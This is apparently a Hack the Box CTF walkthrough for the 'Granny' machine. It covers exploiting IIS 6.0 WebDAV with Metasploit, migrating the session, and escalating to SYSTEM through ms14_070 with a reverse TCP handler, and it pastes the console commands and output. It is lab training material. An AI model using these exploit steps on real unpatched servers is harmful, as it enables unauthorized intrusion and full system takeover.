Hack the Box – Granny Walkthrough

Today we’re going to solve another CTF machine “Granny”. It is now retired box and can be accessible if you’re a VIP member.

Introduction

Specifications

  • Target OS: Windows
  • Services: HTTP
  • IP Address: 10.10.10.15
  • Difficulty: Easy

Weakness

  • Microsoft IIS version 6.0
  • ms15_051_client_copy_image​

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address. After doing intense scan on TCP/UDP ports we found nothing just single TCP 80 Port opened. And it states it’s IIS httpd 6.0

After doing some research we found an remote code execution vulnerability.

Exploitation

Since we have found our vulnerability let’s try to exploit it.

exploit/windows/iis/iis_webdav_upload_asp

After executing the exploit we instantly got the shell.

Privilege Escalation

Since we got user access, now we’re going after NT Authority that’s why we can’t run getuid. So we have to background our shell and use post/windows/manage/migrate module.

So here we see that this module will spawn a notepad.exe process and migrate our shell to run within that process. All we need to give is the name of our shell’s session which we set to the background earlier.

msf exploit(iis_webdav_upload_asp) > use post/windows/manage/migrate msf post(migrate) > show options Module options (post/windows/manage/migrate): Name Current Setting Required Description ---- --------------- -------- ----------- KILL false no Kill original process for the session. NAME no Name of process to migrate to. PID no PID of process to migrate to. SESSION yes The session to run this module on. SPAWN true no Spawn process to migrate to. If name for process not given notepad.exe is used. msf post(migrate) > set SESSION 1 SESSION => 1 msf post(migrate) > run [] Running module against GRANNY [] Current server process: svchost.exe (2624) [] Spawning notepad.exe process to migrate to [+] Migrating to 228 [+] Successfully migrated to process 228 [] Post module execution completed msf post(migrate) >

It worked anyway!

msf post(migrate) > set SESSION 1 SESSION => 1 msf post(migrate) > run [] Running module against GRANNY [] Current server process: svchost.exe (2624) [] Spawning notepad.exe process to migrate to [+] Migrating to 228 [+] Successfully migrated to process 228 [] Post module execution completed msf post(migrate) > sessions 1 [*] Starting interaction with 1… meterpreter > sysinfo Computer : GRANNY OS : Windows .NET Server (Build 3790, Service Pack 2). Architecture : x86 System Language : en_US Domain : HTB Logged On Users : 2 Meterpreter : x86/windows meterpreter > getuid Server username: NT AUTHORITY\NETWORK SERVICE meterpreter >

At this point it is a good idea to migrate to a process running under NT AUTHORITY\NETWORK SERVICE​. In this case davcdata.exe ​seemed to be the only stable process available. The intended exploit in this case is ms15_051_client_copy_image​, which immediately grants a root shell.

meterpreter > background [*] Backgrounding session 1… msf post(migrate) > use post/multi/recon/local_exploit_suggester msf post(local_exploit_suggester) > show options Module options (post/multi/recon/local_exploit_suggester): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on. SHOWDESCRIPTION false yes Displays a detailed description for the available exploits msf post(local_exploit_suggester) > set SESSION 1 SESSION => 1 msf post(local_exploit_suggester) >

After running this module we started to get some suggestions that this machine is vulnerable to this vulnerability.

msf post(local_exploit_suggester) > run [] 10.10.10.15 - Collecting local exploits for x86/windows… [] 10.10.10.15 - 38 exploit checks are being tried… [+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated. [+] 10.10.10.15 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated. [+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. [*] Post module execution completed

So, now we have to test every exploit to see which actually works.

I found this one useful.

msf post(migrate) > use exploit/windows/local/ms14_070_tcpip_ioctl msf exploit(ms14_070_tcpip_ioctl) > run [] Started reverse TCP handler on 10.10.14.4:4444 [] Storing the shellcode in memory… [] Triggering the vulnerability… [] Checking privileges after exploitation… [+] Exploitation successful! [] Sending stage (179267 bytes) to 10.10.10.15 [] Meterpreter session 2 opened (10.10.14.4:4444 → 10.10.10.15:1734) at 2018-11-28 23:38:41 +0100 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter >